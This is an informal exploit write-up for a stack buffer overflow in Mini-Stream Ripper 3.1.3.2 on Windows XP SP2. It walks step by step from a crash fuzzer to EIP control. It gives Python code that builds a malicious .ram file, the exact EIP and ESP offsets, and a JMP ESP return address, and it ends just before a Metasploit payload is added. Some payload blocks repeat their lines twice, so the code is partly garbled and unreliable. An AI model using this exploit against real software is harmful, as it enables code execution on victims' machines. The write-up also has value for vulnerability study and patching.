# Exploit Title: Mini-Stream Ripper
3.1.3.2.2010.06.13 Buffer Overflow
# Link:
http://mini-stream.net/mini-stream-ripper/download/
# Version: 3.1.3.2.2010.06.13
# Tested on: Microsoft Windows XP SP 2
ok, i have this fuzzer, and i'll try to exploit this application, fuzzer :
wed = "http://."
wed+= "\x41" * 18000
f=open("dos.ram","w+")
f.write(wed)
f.close()
let's try to catch that. first time, prepare immunity debbuger, fuzzer and mini stream ripper. then running this application from immunity, when i load my fuzzer, i find that the application error in 18000 char, and i can see that address of EIP covered by 414141. we know this is direct ret, so this is will easily. now i try to find how many byte EIP covered using pattern_create by framework. this address of EIP covered by char 69573569 and ESP Wi8Wi9Wj0. after this, we can know how many byte the registers covered using pattern_offset.
ESP hit the byte 17424 and EIP hit the byte in 17416. now, i'll try using this fuzzer to ensure address from EIP.
wed = "http://."
wed+= "\x90" * 17416
wed+= "\xEF\xBE\xAD\xDE"
wed+= "\x90" * 17416
wed+= "\xEF\xBE\xAD\xDE"
f=open("dos.ram","w+")
f.write(wed)
f.close()
and address from EIP change DEADBEEF. after this, i'll try to find JMP ESP, let's go find it :D
with this fuzzer i find address of JMP ESP in user32.dll with address 77D8AF0A.
wed = "http://."
wed+= "\x90" * 17416
wed+= "\xEF\xBE\xAD\xDE"
wed+= "\x90" * (17424 -len(wed))
wed+= "\xCC" * (18000 -len(wed))
wed+= "\x90" * 17416
wed+= "\xEF\xBE\xAD\xDE"
wed+= "\x90" * (17424 -len(wed))
wed+= "\xCC" * (18000 -len(wed))
f=open("dos.ram","w+")
f.write(wed)
f.close()
now i try to exploit this application with payload from metasploit.